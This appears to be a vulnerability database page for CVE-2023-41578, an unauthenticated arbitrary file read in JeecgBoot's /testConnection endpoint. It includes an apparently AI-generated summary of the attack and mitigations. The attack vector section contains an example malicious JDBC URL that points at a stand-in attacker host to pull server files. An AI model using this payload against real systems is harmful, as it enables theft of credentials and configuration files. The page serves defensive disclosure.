CVE-2023-41578
Description
Jeecg boot up to v3.5.3 was discovered to contain an arbitrary file read vulnerability via the interface /testConnection.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
JeecgBoot up to v3.5.3 allows unauthenticated arbitrary file read via a crafted MySQL connection in the /testConnection endpoint.
Vulnerability
Description
CVE-2023-41578 is an arbitrary file read vulnerability in JeecgBoot versions up to v3.5.3. The flaw exists in the /testConnection endpoint, which is used to test database connections. The application constructs a JDBC connection string from user-supplied input without proper sanitization, allowing an attacker to leverage the MySQL Connector/J's ability to read local files via the LOAD DATA LOCAL INFILE or similar mechanisms.
Attack
Vector
An attacker can exploit this by sending a crafted POST request to /testConnection with a malicious dbUrl parameter that includes a MySQL connection string designed to read arbitrary files from the server (e.g., jdbc:mysql://attacker.com/test?allowLoadLocalInfile=true&autoDeserialize=true). The attack does not require authentication and can be performed remotely if the application is accessible. The GitHub issue [2] provides a detailed proof-of-concept.
Impact
Successful exploitation allows an attacker to read sensitive files from the server, such as configuration files, credentials, or application source code, potentially leading to further compromise of the system. The vulnerability is categorized as high severity due to the ease of exploitation and the potential for data disclosure.
Mitigation
As of the advisory, JeecgBoot has not released an official patch for this specific version. Users are advised to upgrade to a later version (e.g., v3.5.4 or higher) once available, or restrict access to the /testConnection endpoint to trusted networks. The vulnerability has been publicly disclosed, and exploitation may be possible if the application remains unpatched [1][3].
AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
org.jeecgframework.boot:jeecg-boot-parentMaven | <= 3.5.3 | — |
Affected products
1Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
3- github.com/advisories/GHSA-pm8v-ppx7-8hr4ghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2023-41578ghsaADVISORY
- github.com/Snakinya/Bugs/issues/1ghsaWEB
News mentions
0No linked articles in our index yet.